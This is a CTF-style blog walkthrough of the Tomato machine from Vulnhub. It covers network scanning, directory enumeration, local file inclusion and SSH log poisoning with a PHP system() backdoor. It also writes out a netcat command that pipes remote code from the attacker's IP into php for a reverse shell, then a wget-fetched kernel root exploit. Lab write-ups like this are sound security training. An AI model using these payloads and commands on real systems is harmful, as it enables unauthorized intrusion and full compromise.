Categories
Vulnhub Walkthrough

Tomato Vulnhub Walkthrough

In this article we will share another Vulnhub Machine Walkthrough Tomato. and this VM is created by the sunCSR Team. The difficulty of the VM Medium to Hard. and this VM is hosted on Vulnhub Server. you can download here this Machine.

Network Scanning

To begin we will find the IP address of our target machine, use the following command.

nmap -sn 192.168.43.1/24

We found the target’s IP Address 192.168.43.144. and The next step is to scan the target machine ports by using the Nmap tool.

nmap -sV 192.168.43.144 -p-

After the scan, we saw that port 21FTP, 80HTTP, 2211/SSH, and 8888/HTTP running Nginx HTTP Server. Let’s move the enumeration step.

Enumeration

We started from port 80/HTTP and tried to open the target machine webpage on our browser by navigating the IP address.

http://192.168.43.144

For more enumeration, we run the gobuster directory brute forcing web directory to enumerate all files and directory.

gobuster dir --url http://192.168.43.144 -w /usr/share/wordlists/dirb/common.txt

and we discover a useful directory antibot_image. after navigating the directory we see many files and directory let’s open the info.php

http://192.168.43.144/antibot_image/antibots/info.php

Now we are reading the page source code and we found a comment. it is likely that the page is vulnerable to LFI (Local File Inclusion). So, without wasting our time, we can try to access /etc/passwd.

http://192.168.43.144/antibot_image/antibots/info.php?image=../../../../../etc/passwd

here we try Apache log poisoning through SSH creating a GET system backdoor.

ssh '<?php system($_GET['shell']); ?>'@192.168.43.144 -p2211

After running the log poisoning command we will create a PHP reverse shell and we upload the shell target machine by using netcat. let’s run the commands. remember first start your, netcat listener.

vi rshell.php
sudo nc -lvp 40 < rshell.php
sudo -nc -lvp 555

Now this time is executing download our payload target machine and we use an extra command |php after upload our shell is automatic execute.

http://192.168.43.144/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log&shell=nc 192.168.43.103 40 |php

Privilege Escalation

Now we got a reverse connection target machine. let’s move the next step escalate the privilege target machine. let’s check the kernel version target machine by using the command.

uname -r

we search the exploit for 4.4.0-21-generic and we found a local root privilege escalation exploit on exploit-db. our target system hasn’t GCC compiler. let’s open another terminal our local machine and compile the exploit.

After compiling the exploit we started our local python server on port 80 and download the exploit our target machine /tmp directory and adding execute permission and run the exploit.

wget http://192.168.43.103:88/get_root
chmod +x get_root
./get_root

After executing the exploit we see a root blank shell. let’s move the root directory and read our final flag proof.txt.

id
cd /root
ls
cat proof.txt

Nyx: 1 Vulnhub Walkthrough link

By Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View Archive